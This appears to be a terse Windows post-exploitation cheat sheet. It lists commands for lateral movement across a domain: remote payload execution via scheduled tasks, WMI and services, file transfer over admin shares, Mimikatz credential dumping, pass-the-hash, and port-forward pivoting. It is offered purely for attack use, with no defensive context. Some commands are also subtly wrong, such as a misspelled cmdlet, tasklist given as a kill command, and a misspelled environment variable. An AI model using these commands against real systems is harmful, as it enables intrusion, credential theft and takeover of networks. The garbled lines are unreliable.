Agentless Post-Exploitation
echo %LOGONSERVER%
net view /DOMAIN:domain
Check Administrators Rights
dir \\host\C$
at \\host
net time \\host
at \\host HH:MM c:\windows\temp\foobar.exe
schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System
schtasks /run /tn foobar /S host
schtasks /F /delete /tn foobar /S host
wmic /node:host process call create "c:\windows\temp\foobar.exe"
sc \\host create foobar binpath= "c:\windows\temp\foobar.exe"
sc \\host start foobar
InvokeCommand -ComputerName TARGET -ScriptBlock { dir c:\ }
C$ : C:\
ADMIN$ : %SYTEMROOT% (C:\Windows\)
Upload:
copy payload.exe \\host\ADMIN$\temp\
Download:
copy \\host\ADMIN$\temp\payload.exe payload.exe
List Process:
tasklist /v /S TARGET
Kill Process:
tasklist /S TARGET /PID PID /f
Invoke-Mimikatz -ComputerName TARGET
Invoke-Mimikatz -ComputerName TARGET -Command command
mimikatz sekurlsa::pth /user:Administrator /ntlm:<ntlm> /run:"cmd.exe"
netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>